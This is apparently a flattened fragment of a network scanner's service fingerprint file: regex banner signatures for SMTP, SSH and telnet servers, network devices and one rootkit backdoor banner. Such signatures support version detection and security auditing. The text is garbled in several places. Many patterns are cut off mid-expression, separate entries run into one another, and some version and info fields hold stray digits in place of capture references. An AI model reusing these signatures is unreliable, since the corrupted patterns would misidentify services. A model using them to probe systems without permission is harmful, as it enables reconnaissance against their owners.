ready\.\r\n -220 BEJY V([\w._-]+) SMTP ([\w._-]+) \(c\) \d+-\d+ by BebboSoft, Stefan \"Bebbo\" Franke, all rights reserved ready\r\n -220 Welcome NGOS SMTP Server version ([\w._-]+)\r\n -220 ([\w._-]+) Kerio Connect ([\w._ -]+) ESMTP ready\r\n -220 ([\w._-]+) running IBM VM SMTP Level (\d+) on -421 4\.3\.2 Service not available\r\n -220 ([\w._-]+) Service ready by David\.fx \(([\w._-]+)\) ESMTP Server \(Tobit\.Software, Germany\)\r\n -220 HOST: ([\w._-]+) Supportworks ESMTP Server ([\w._-]+) ready\r\n -220 ([-\w_.]+) SMTP/DeleGate/([\d.]+) ready at .*\r\n -220 ([-/.+\w]+) SMTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n -220 ([-\w_.]+) ESMTP spamd IP-based SPAM blocker; .*\r\n -220 ESMTP smtprelay service ready\.\r\n -220 ([-\w_.]+) SMTP hotsmtpd v([\d.]+)\. ESMTP-HTTPMail Gateway based on hotwayd\.\r\n -220 ([-\w_.]+) Welcome SpamFilter for ISP SMTP Server v([\d.]+) - Unlicensed Evaluation Copy\r\n -421 proxyplus\.universe SMTP server\. Insecure access - terminating\.\r\n -220 AVG ESMTP Proxy Server Beta - ([\d./]+) \[[\d.]+\]\r\n -220 AVG ESMTP Proxy Server ([\d./]+) \[[\d./]+\]\r\n -554 ([\d.]+) ([-\w_.]+) No mail service\r\n -220 Traffic Inspector SMTP Gate \(SPAM protected\), ver\. ([\w._-]+), ready at.*\r\n -220 mailwall SMTP Server \(Ikarus MailWall by David Grabenweger\) ready\r\n -220 ([-\w_.]+) ESMTP - eXpurgate ([\d.]+) \( -220 CCProxy ([\d.]+) SMTP Service Ready\(Unregistered\)\r\n -NoSpamToday! SMTP Proxy Monitoring Service Ready\.\r\n -220 ([-\w_.]+) ESMTP bitdefender -220 ([-\w_.]+) ESMTP BitDefender Proxy version ([^\r\n]+)\r\n -220 [-\w_.]+ avast! SMTP proxy ready\.\r\n -220 ([-\w_.]+) (SCM\d+)/SMTP Ready\.\r\n -554 You are not allowed to connect\.\r\n -220 ([\w._-]+) ESMTP Symantec Brightmail Gateway\r\n -220 ([\w._-]+) ESMTP server ready \(Alligate v([\w._-]+)\)(?: AUTH ONLY)?\r\n -220 ([\w._-]+)\.ARK Sendmail ready\. \r\n -421 too many connections\r\n -220 ([-\w_.]+) ESMTP Service ready\r\n -220 ([\w._-]+) AVKSMTP Server\r\n -220 (\S+) Welcome to SpamFilter for ISP SMTP Server v(\d\S+) -220[\s-].*?E?SMTP[^\r]*\r\n -550 (\d.\d.\d) ([^\r\n]+) -Statistics from .*\n M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer\n -220 ([-.\w]+) SNPP server \(HylaFAX \(tm\) Version ([-.\w]+)\) ready.\r\n -220 QuickPage v(\d[-.\w]+) SNPP server ready at -250\r\nProtocol-Version:(\d[\d.]+)\r\nMessage-ID:\d+\r\nDatabase .*\r\nContent-Length:\d+\r\nKey Length:(\d+)\r\n\r\n.*(\w:\\.*ini)\r\n\r\n -SPMD_ACK\0\0\x01\0\x01 -SSH-([\d.]+)-([\d.]+) F-Secure SSH Windows NT Server\r?\n -SSH-([\d.]+)-([\d.]+) dss F-SECURE SSH\r?\n -SSH-([\d.]+)-([\d.]+) F-SECURE SSH.*\r?\n -SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+) - Process Software MultiNet\r\n -SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+)\r?\n -SSH-(\d[\d.]+)-SSH Protocol Compatible Server SCS (\d[-.\w]+)\r?\n -SSH-([\d.]+)-SSH Compatible Server\r?\n -SSH-([\d.]+)-([\d.]+) SSH Secure Shell Tru64 UNIX\r?\n -SSH-([\d.]+)-(\d+\.\d+\.\d+) SSH Secure Shell -sshd: SSH Secure Shell (\d[-.\w]+) on ([-.\w]+)\nSSH-(\d[\d.]+)- -sshd2\[\d+\]: .*\r\nSSH-([\d.]+)-(\d[-.\w]+) SSH Secure Shell \(([^\r\n\)]+)\)\r?\n -SSH-([\d.]+)-(\d+\.\d+\.[-.\w]+) -SSH-([\d.]+)-OpenSSH_([\w._-]+) Debian-(\S*maemo\S*)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+)[ -]{1,2}Debian[ -_]([^\r\n]+)\r?\n -SSH-([\d.]+)-OpenSSH_[\w.]+-FC-([\w.-]+)\.fc(\d+)\r\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-([\d]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD localisations (\d+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-(?:[\w.,]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-overwrite-base -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-gssapi- -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) miniBSD-([\d]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) NetBSD_Secure_Shell-([\w._-]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+)_Mikrotik_v([\d.]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) in RemotelyAnywhere ([\d.]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+)\+CAN-2004-0175\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) NCSA_GSSAPI_20040818 KRB5\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn\w+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+\+sftpfilecontrol-v[\d.]+-hpn\w+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn) NCSA_GSSAPI_\d+ KRB5\r?\n -SSH-([\d.]+)-OpenSSH_3\.4\+p1\+gssapi\+OpenSSH_3\.7\.1buf_fix\+2006100301\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+\.RL)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+-CERN\d+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+\.cern-hpn) -SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+-pwexp\d+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+)-chrootssh\n -SSH-([\d.]+)-Nortel\r?\n -SSH-([\d.]+)-OpenSSH_([\w_.-]+) DragonFly-\d+\r?\n -SSH-([\d.]+)-OpenSSH_([\w_.-]+) FIPS\n -# 2) Don't match unknown SSHs (and generate fingerprints) -\0\0\0\\0\0\0\0\x01\0\0\0\x1bNo host key is configured!\n\r!\"v -SSH-(\d[\d.]+)-SSF-(\d[-.\w]+)\r?\n -SSH-(\d[\d.]+)-lshd_(\d[-.\w]+) lsh - a free ssh\r\n\0\0 -SSH-(\d[\d.]+)-lshd-(\d[-.\w]+) lsh - a GNU ssh\r\n\0\0 -SSH-([\d.]+)-Sun_SSH_(\S+) -SSH-([\d.]+)-meow roototkt by rebel -SSH-(\d[\d.]*)-(AKAMAI-I*)\r?\n -SSH-(\d[\d.]*)-(Server-V)\r?\n -SSH-(\d[\d.]*)-(Server-VI)\r?\n -SSH-(\d[\d.]*)-(Server-VII)\r?\n -SSH-(\d[\d.]+)-Cisco-(\d[\d.]+)\r?\n -\r\nDestination server does not have Ssh activated\.\r\nContact Cisco Systems, Inc to purchase a\r\nlicense key to activate Ssh\.\r\n -SSH-2\.0-0\.0 \r?\n -SSH-([\d.]+)-([\w.]+) VShell\r?\n -SSH-([\d.]+)-([\w.]+) \(beta\) VShell\r?\n -SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD (\d[-.\w]+)\r?\n -SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD\r?\n -SSH-([\d.]+)-([\w._-]+) sshlib: sshlibSrSshServer ([\w._-]+)\r\n -SSH-([\d.]+)-([\w._-]+) sshlib: GlobalScape\r?\n -SSH-([\d.]+)-([\w._-]+) sshlib: EdmzSshDaemon ([\w._-]+)\r\n -SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+)\r\n -SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+): free only for personal non-commercial use\r\n -SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD: free only for personal non-commercial use\r\n -SSH-1\.5-X\r?\n -Access to service sshd from [-\w_.]+@[-\w_.]+ has been denied\.\r\n -SSH-([\d.]+)-FortiSSH_([\d.]+)\r?\n -SSH-([\d.]+)-cryptlib\r?\n -SSH-2\.0-1\.0 Radware SSH \r?\n -SSH-2\.0-(\d{8,12})\r?\n -SSH-2\.0-Twisted\r?\n -SSH-2\.0-PGP\r?\n -SSH-([\d.]+)-libssh-([-\w.]+)\r?\n -SSH-([\d.]+)-HUAWEI-VRP([\d.]+)\r?\n -SSH-([\d.]+)-VRP-([\d.]+)\r?\n -SSH-([\d.]+)-lancom\r?\n -SSH-([\d.]+)-xxxxxxx\r?\n| p|Fortinet VPN/firewall sshd -SSH-([\d.]+)-AOS_SSH\r?\n -SSH-([\d.]+)-RedlineNetworksSSH_([\d.]+) Derived_From_OpenSSH-([\d.])+\r?\n -SSH-([\d.]+)-DLink Corp\. SSH server ver ([\d.]+)\r?\n -SSH-([\d.]+)-FreSSH\.([\d.]+)\r?\n -SSH-([\d.]+)-Neteyes-C-Series_([\d.]+)\r?\n -SSH-([\d.]+)-IPSSH-([\d.]+)\r?\n| p|Cisco/3com IPSSHd -SSH-([\d.]+)-DigiSSH_([\d.]+)\r?\n -SSH-([\d.]+)-0 Tasman Networks Inc\.\r?\n -SSH-([\d.]+)-([\w.]+)rad\r?\n -SSH-([\d.]+)-OpenSSH_([\d.]+) in DesktopAuthority ([\d.]+)\r?\n -SSH-1\.5-SSH\.0\.1\r?\n -SSH-([\d.]+)-Ingrian_SSH\r?\n -SSH-([\d.]+)-PSFTPd PE\. Secure FTP Server ready\r?\n -SSH-([\d.]+)-BlueArcSSH_([\d.]+)\r?\n -SSH-([\d.]+)-Zyxel SSH server\r?\n -SSH-([\d.]+)-paramiko_([\w._-]+)\r?\n -SSH-2\.0-SSH_0\.2\r?\n -SSH-([\d.]+)-CoreFTP-([\w._-]+)\r?\n -SSH-([\d.]+)-RomSShell_([\w._-]+)\r\n -Could not load host key\. Closing connection\.\.\. -SSH-([\d.]+)-WS_FTP-SSH_([\w._-]+)(?: FIPS)?\r\n -SSH-([\d.]+)-http://www\.sshtools\.com J2SSH \[SERVER\]\r\n -SSH-([\d.]+)-DraySSH_([\w._-]+)\n\n\rNo connection is available now\. Try again later! -SSH-([\d.]+)-Pragma FortressSSH ([\d.]+)\n -SSH-([\d.]+)-SysaxSSH_([\d.]+)\r\n -SSH-([\d.]+)-1\.00\r\n -SSH-([\d.]+)-Foxit-WAC-Server-([\d.]+ Build \d+)\n -SSH-([\d.]+)-ROSSSH\r\n -SSH-([\d.]+)-3Com OS-([\w._-]+ Release \w+)\n -SSH-([\d.]+)-3Com OS-3Com OS V([\w._-]+)\n -SSH-([\d.]+)-XXXX\r\n -SSH-([\d.]+)-xxx\r\n -SSH-([\d.]+)-OpenSSH_([\w._-]+)-HipServ\n -SSH-([\d.]+)-xlightftpd_release_([\w._-]+)\r\n -SSH-([\d.]+)-Serv-U_([\w._-]+)\r\n -SSH-([\d.]+)-CerberusFTPServer_([\w._-]+)\r\n -Soldat Admin Connection Established\.\r\nPassword request timed out\.\r\n -unknown command \r\nunknown command \r\n -\* OK SSP MagniComp SysInfo Server ([\w._-]+)\n -RPY \d \d \. \d \d+\r\nContent-Type: application/beep\+xml\r\n -\0\0\0\x0bSynergy\0\x01\0 -\x80\0\0\\0\0\0\x01I\xae\xeb\xc1\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\" -USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n -You are not welcome to use (\w+) from [\w._-]+\.\n -welcome userid=\d+ servername=\"([^"]+)\" motd=\"\" forwarding=\d+ channels=\d+ operators=\d+ maxusers=\d+ protocol=\"([\d.]+)\"\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f -\xff\xfd\x18\xff\xfb\x01\n\r\n\rPassword: -\xff\xfc\x01\r\nPlease type \[Return\] two times, to initialize telnet configuration\r\nFor HELP type \"\?\"\r\n> -\x1b\[H\x1b\[2JYou have connected to a FirstClass System\. Please login\.\.\.\r\nUserID: -\xff\xfb\x03\xff\xfb\x01\r\nCopyright \d+ Sun Microsystems, Inc\. All rights reserved\.\r\nUse is subject to license terms\.\r\n\r\n\r\nSun\(tm\) Advanced Lights Out Manager ([\d.]+) \(([\w._-]+)\)\r\n\r\nPlease login: -\xff\xfb\x01\xff\xfb\x01Connected to [-/.+\w]+!\r\n\r\nPassword: -220 SL4NT viewer service ready\r\n250 Currently connected channels: -\xff\xfb\x03\xff\xfb\0\xff\xfb\0\xff\xfd\0\xff.*\r\rFrontDoor (\d[-.\w]+)/ -\xff\xfb\x01\xff\xfb\x03\r\nOK\r\n -\xff\xfb\x03\xff\xfd\x03\xff\xfc\x06.*\nPrecidia Technologies\r\n([-.+\w]+) Remote Configuration\r\n\nPassword\? -\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01WinCE/WBT Command Shell Version (\d[-.\w]+)\r\nSerial Number: (\w+) MAC Address: 0000(\w+)\r\nUUID: [-\w]+\r\nPassword: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[Hname: -\xff\xfb\x01\n\r-> \x08\x08\x08\x08 \*\*\* EPSON Network Scanner Server \((.*)\) \*\*\*\n\r\n\r\x08\x08\x08\x08 \n\r -\xff\xfb\x01\r\nNetportExpress\(tm\) ([-/.+\w]+)\r\n.*\r\n\r\nlogin: -login: \xff\xfd\x03\xff\xfb\x03\xff\xfb\x01 -\xff\xfb\x01\r\npassword: -\xff\xfb\x01\xff\xfd\x18\xff\xfd# -\xff\xfb\x03\xff\xfb\x01\r\nPassword: -\x1b\[20;1H\r\n\r\x1b\[\?25h\x1b\[20;11H\x1b\[21;1HSession Terminated, Connect again\r\n\r\x1b\[\?25h\x1b\[21;1H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[[34];23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HHP [-.\w]+ ProCurve Switch ([-.\w]+)\r\n\rFirmware revision ([-.\w]+)\r\n\r\r -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r.*Procurve Wireless Access Point (\d+)\r\n -Check Point FireWall-1 Client Authentication Server running on [-.\w]+\r\n\r\xff\xfb\x01\xff\xfe\x01\xff\xfb\x03User: -\xff\xfb\x01\xff\xfb\x03\r\nUsername: -\xff\xfd%\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0 -\xff\xfd\x03\xff\xfb\x03\xff\xfd'\xff\xfd\x18\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfe\x01GUI START\n -match telnet m=^\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0Microsoft \(R\) Windows (NT |)\(TM\) Version (\d[-.\w]+) \(Build (\d+)\)\r\nWelcome to Microsoft Telnet Service \r\nTelnet Server Build (\d[-.\w]+)\n\rlogin: = p/Microsoft Windows 1telnetd/ v/4/ i/OS version 2 build 3/ o/Windows/ cpe:/o:microsoft:windows/a -\xff\xfd'\xff\xfd\x18| p|IBM OS/400 telnetd| o|OS/400 -\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\nPassword is not set\r\n -\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\n\r\nEnter username: -\xff\xfd\x03\xff\xfb\x01\xff\xfd!| p|HP MPE/iX telnetd -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nIQinVision IQeye3 Version ([vV].*)\n\r\nType HELP -\xff\xfe%\xff\xfd\x18 -\r\nEfficient ([-.\w ]+) Router \(([-.\d/]+)\) v(\d[-.\w]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: -\r\nRaptor Firewall Secure Gateway\.\r\n -\r\nSynchronet BBS for Win32 Version (\d[-.\w]+)\r\n -\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b.*BayStack ([-\w_.]+) .*HW:(\w+) FW:V([\d.]+) SW:V([\d.]+)\x1b -\xff\xfb\x01\x1b\[2J\x1b\[58259456;1H\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* \*\*\*\*\* \* \*\x1b\[2;1H -\xff\xfb\x01\n\r\n.*Bay Networks (Bay[-.: \w]+)\n\r -Check Point FireWall-1 authenticated Telnet server running on -\xff\xfb\x01\r\n\rType \"\?\" at the command prompt for a list of commands\.\n\r.*Command-> -\xff\xfb\x01\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[9;20HCopyright\(C\) 1995-99 D-Link Systems Inc\.\x1b\[13;30HUser Name\x1b\[14;30HPassword\x1b\[23;10HMAC Address:\x1b\[8;29H([-.\w]+) Console Program\x1b\[13;41H -\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03Ambit Cable Router\r\n\r\nLogin: -\n\rVina Technologies (.*) \((\d[-.\w]+ build \d+)\) -\xff\xfd\x03\xff\xfb\x03\xff\xfb\x01\x1b\[0m\x1b\[1;1H\x1b\[2J\rD\r \n\r (DES-.*) Command Line Interface\n\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfc\x1f\n\r\n\rUser Access Verification\n\r\n\r\n\r\n\r\n\rShell version (\d\S+).*Maipu Communication Technology Co\. -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x1b.*Intel Corporation, ([-+. \w()]+) -\r\nFlowPoint/(.*) Ready\r\n.*\xff\xfb\x01\xff\xfb -Tenor Multipath Switch CDR Server\r\nConnected from IpAddr/Port# [\d.]+/\d+ to Port# \d+\r\nPassword: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\x0d\x0a\x0d\x0aCisco\x20Systems.*Console/Telnet Access of the ([-. \w]+) for Configuration Purposes -\xff\xfb\x01\n\r\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 \x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 -\r\n\r\nUser Access Verification\r\nPassword:\xff\xfb\x01 -match telnet m=^\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f.*User Access Verification\r\n\r\n(?:Username|Password): =s p/Cisco IOS telnetd/ d/switch/ o/IOS/ cpe:/o:cisco:ios/a -\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\nUser Access Verification\r\n\r\nPassword: -\xff\xfb\x01\r\r\nUser Access Verification\r\r\n\r\r\nUsername: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems Console\r\n -# The match below matches Cisco microswitch devices and also Edge-core ES3526XA -\xff\xfd\x18 -\xff\xfd\x18\xff\xfd\x1f\xff\xfd#\xff\xfd'\xff\xfd\ -\xff\xfb\x01\n\rUser Name : -\xff\xfd\ -\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rlogin: -\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\n\r\nUsername: -\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'\xff\xfd\| p|Openwall GNU/*/Linux telnetd -\xff\xfc\x01\r\nHP JetDirect\r\n\r\nPlease type \"\?\" for HELP, or \"/\" for current settings\r\n> -\xff\xfb\x01\xff\xfb\x03\r\nAXIS (\S+) TELNET -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03.*?FORE\x20Systems,\x20FORE\x20ES-2810.*?Version (\d[\d\.-]+) -\xff\xfb\x03\xff\xfb\x01.*ForeRunner ES-3810.*Enter Username: -\xff\xfb\x01\r\nCopyright \(C\) 1999 by Extreme Networks\r\r\n -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03.*?ES-1000\x20Fast\x20Ethernet\x20Switch\x20Console -\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to ([-\w_]+) Debug Terminal - \d*\n\r\n\r\n\rlogin: -\x1b\[0m\x1b\[2J\x1b\[01;28HCONEXANT SYSTEMS, INC\.\x1b\[02;19H ACCESS RUNNER ADSL CONSOLE PORT\x1b\[24;01H>>>\x1b\[24;01HLOGON PASSWORD>\x1b\[02;53H3\.\d+\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nWelcome on (.*)\r\n\r\n\r\nUsername: -\xff\xfb\x01\xff\xfd\x18\nTelnet Service on the PrintServer\n\n\rPassword: | p|Hawking/TRENDnet Print Server telnetd -\xff\xfb\x01\xff\xfb\x03\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([\d.]+) \r\n\r\n\rUsername: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\x07\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([-\w_.]+) \r\n\r\n\rUsername: -\xff\xfd\(| p|IBM OS/390 or SNA telnetd -\xff\xfb\r\nRemotelyAnywhere Telnet Server v([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x18([^\r\n]+)\r\nRemotelyAnywhere Telnet Server ([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: -\r\nVxWorks login: \xff\xfb\x01 -\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\nSelect Access Level\r\n===================\r\n1 - Read-Only\r\n2 - Installer\r\n3 - Administrator\r\n13008 >>> -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nExterior router [-\w_.]+\r\nType: Cisco 2651\r\nModule: E3/T3 interface\r\n\r\n -match telnet m=^\xff\xfb\x01\r\n\r\n#\r\n\| ELSA, MicroLink Cable\r\n\| Ver\. ([\d.]+) / [\d.]+ \d\d:\d\d .*\r\n\| SN\. \d+\r\n\| Copyright \(c\) ELSA AG, Aachen \(Germany\)\r\n\r\ncm2, Connection No\.: \d+ \(LAN\) \(read-only connection\)\r\n\r\nPassword:= p/ELSA Microlink Cable modem/ v/1/ i/read-only connection/ d/router/ -\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista Ver\. ([-\w_.]+)\n\r -match telnet m=^\xff\xfb\x01\xff\xfb\x03\r\n\r\n#\r\n\| LANCOM L-54g Wireless\r\n\|= p/LANCOM L-54g Wireless router telnetd/ d/router/ -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems, Inc\. Console\r\n\r\n\r\n\r\r\n\r\nUsername: -\xff\xfb\x01\xff\xfb\x03\r\n\r\n\[ORiNOCO-AP-(\d+)[-\d]*\]> Please enter password: -\xff\xfb\xfd\xff\xfb\x01\n\r\n\rFabric OS \(tm\) Release v([\w.]+)\n\r\n\r -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix MSS100 Version V([\d.]+)/\d+\(\d+\)\n\r\nType HELP at the 'Local_2> ' prompt for assistance\.\n\r\n\r\n\nUsername> -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\r\0\r\n\x07# \0 -\xff\xfb\x01OPTIBASE MGW5100 COMMAND LINE INTERFACE\r\n -match telnet m=^\xff\xfb\x01\r\n\r\n#\r\n\| ELSA LANCOM DSL/I-10 Office\r\n\| Ver\. ([\d.]+) / [\d.]+\r\n\| SN\. (\d+)\r\n= p/Elsa DSL I-10 router telnetd/ v/1/ i/SN 2/ d/router/ -PC Telnetd ([\d.]+)\r\n\r\nlogin: -match telnet m=^\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[H\x1b\[2J\x1b\[0m\x1b\[0m\x1b\[0m\x1b\[H\x1b\[2J\x1b\[0m \+-+\+\r\n \| NuSight GEMS Console +Version v([\d.]+) \|\r\n \| Copyright \(c\) 1998-2001, NPI +\|\r\n= p/NPI Keystone switch telnetd/ v/1/ d/switch/ -rsconfig: port rose not active\n\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: -\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n/bin # -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\nermittle die aktuelle TTY\r\ntty is \"/dev/pts/0\"\r\nConsole Ausgaben auf dieses Terminal umgelenkt\r\n# -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \(2006\.02\.15-21:18\+0000\) Built-in shell \(msh\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nRouter> -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nAmiNET\d+ login: -\xff\xfb\x03\xff\xfb\x01\r\n\r\n\x07HP (\w+) Ethernet SNMP Module\r\n ROM B\.([\d.]+)\r\n EEPROM A\.([\d.]+)\r\n HW B\.([\d.]+)\r\n\r\nEnter password: -USR5450 Telnet server v([\d.]+)\n\r\nPassword : -\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\d\d-\w+-\d+ \d\d:\d\d:\d\d %MSCM-I-NEWTERM: New TELNET connection from (?:[\d.]+)\r\r\nPassword: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\n\nLantronix ETS16 Version V([\d.]+)/\d+\(\d+\)\n\r\0\nType HELP at the 'BRTR-ETS16>' prompt for assistance\.\n\r\0\nUsername> -\r\nWelcome to slush\. \(Version ([\d.]+)\)\r\n\r\n\r\n\xff\xfb\x01\xff\xfb\x03([-\w_. ]+) login: -match telnet m=^\xff\xfb\x01\xff\xfd\x1f\xff\xfb\x03\x1b\[1;1f\x1b\[37m +\x1b\[2;1f +\x1b\[3;1f +\x1b\[4;1f -+ +\x1b\[5;1f\| KpyM Telnet Server v([\d.]+) +\|= p/KpyM telnetd/ v/1/ o/Windows/ cpe:/o:microsoft:windows/a -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[2J\x1b\[2;66H\x1b\[1m\x1b\[21;1H\x1b\[0m-+\x1b\[22;2H\x1b\[0mFunction:\x1b\[23;2H\x1b\[0mMessage:\x1b\[24;2H\x1b\[7mCTRL\+R = Refresh +\x1b\[8;12H\x1b\[0mIBM BladeCenter 4-Port Gb Ethernet Switch Module Console -\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0m =+\r\n AT-8326GB Management System Version ([\d.]+) \r\n Remote - Telnet\r\n -\r\nEfficient 5851 SDSL \[ATM\] Router \(5851-\d+\) v([-\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: -NPC Telnet permit one connection\.\r\n But One connection\(\) already keep alive\.\r\nGood Bye !! \r\n -\xff\xfb\x01\r\nWelcome to NetLinx v([\d.]+) Copyright AMX Corp\. \d+-\d+\r\n> -\r\nSiemens \d+ T1E1 \[COMBO\] Router \(([-\d]+)\) v([\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: -\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[4;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HCopyright \(C\) 1991-1994 Hewlett-Packard Co\. All Rights Reserved\. 